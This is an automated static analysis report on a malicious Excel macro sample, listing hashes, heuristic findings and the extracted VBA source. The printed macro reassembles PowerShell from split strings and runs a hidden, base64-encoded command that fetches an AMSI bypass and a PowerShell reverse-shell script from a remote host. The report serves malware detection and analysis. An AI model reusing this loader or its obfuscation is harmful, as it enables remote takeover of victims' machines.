Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 c010977231ad75e9…

MALICIOUS

Office (OOXML)

13.5 KB Created: 2021-01-14 10:29:54 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2021-01-23
MD5: 11c7987010259df380a450ad84d5907a SHA-1: 7621427a40e45489db421347a7b8a2194062205e SHA-256: c010977231ad75e9d7f1665984ca00be98ac71e40c51264690ed763d0cf9ebdc
180 Risk Score

Heuristics 4

  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        CreateObject("WScript.Shell").Run (awdfty & Str)
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
    Matched line in script
        CreateObject("WScript.Shell").Run (awdfty & Str)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        CreateObject("WScript.Shell").Run (awdfty & Str)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1444 bytes
SHA-256: 41ca802c250cc30a04ad66fd3dd26d37ee609ac5da50803453698ce9211bf504
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Test()
    Dim Str As String
    Dim awdfty
    Dim CrObct
    Dim WSSll
    
    awdfty = "p" & "o" & "w" & "e" & "r" & "s" & "h" & "e" & "l" & "l" & "." & "e" & "x" & "e" & " "
    CrObct = "C" & "r" & "e" & "a" & "t" & "e" & "O" & "b" & "j" & "e" & "c" & "t"
    WSSll = "W" & "S" & "c" & "r" & "i" & "p" & "t" & "." & "S" & "h" & "e" & "l" & "l"
    
    Str = Str + "-nop -w hidden -e aQBlAHgAKABpAHcAc"
    Str = Str + "gAgAGgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADIALgA0AC8AYQB"
    Str = Str + "tAHMAaQBiAHkAcABhAHMAcwApADsAaQBlAHgAKABpAHcAcgAgA"
    Str = Str + "GgAdAB0AHAAOgAvAC8AMQAwAC4AMAAuADIALgA0AC8ASQBuAHY"
    Str = Str + "AbwBrAGUALQBQAG8AdwBlAHIAUwBoAGUAbABsAFQAYwBwAC4Ac"
    Str = Str + "ABzADEAKQA="
    
    CreateObject("WScript.Shell").Run (awdfty & Str)

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 16896 bytes
SHA-256: b5377b968809fdac36028134009c3cd19d1067dea98f43d6feb799a680bcc40f